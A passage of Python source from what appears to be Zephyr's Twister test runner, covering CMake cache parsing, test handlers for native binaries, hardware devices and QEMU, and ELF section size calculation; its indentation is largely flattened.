def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
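    # Illustrative matches (added), showing how CACHE_ENTRY splits a line:
    #   'CMAKE_C_COMPILER:FILEPATH=/usr/bin/gcc' -> ('CMAKE_C_COMPILER', 'FILEPATH', '/usr/bin/gcc')
    #   'CONFIG_DEBUG:BOOL=ON'                   -> ('CONFIG_DEBUG', 'BOOL', 'ON'), then _to_bool -> True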
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
        if val in ('ON', 'YES', 'TRUE', 'Y'):
            return True
        elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
            return False
        elif val.endswith('-NOTFOUND'):
            return False
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
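# Usage sketch (added; the file path and key names are hypothetical):
#
#   cache = CMakeCache.from_file("build/CMakeCache.txt")
#   board = cache.get("CACHED_BOARD")        # plain value, or None if absent
#   flags = cache.get_list("CMAKE_C_FLAGS")  # always a list, [] if absent
#   if "ZEPHYR_TOOLCHAIN_VARIANT" in cache:
#       print(cache["ZEPHYR_TOOLCHAIN_VARIANT"])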
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
        # Encapsulate terminate functionality so we do it consistently wherever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of how both newer ninja (1.6.0 or greater) and .NET / renode
        # work: newer versions of ninja don't seem to pass SIGTERM down to the
        # children, so we need try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
# ignore SerialException which may happen during the serial device
# power off/on process.
except serial.SerialException:
pass
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
            # Receive parameters from a runner_params field
            # of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
        # Sometimes a test instance fails to execute and ends up with no
        # status; fill the results in as "blocked" so that it is still
        # included in the final report.
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
                    # There's a possibility that we polled nothing because
                    # the host scheduled too little CPU time to the QEMU
                    # process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
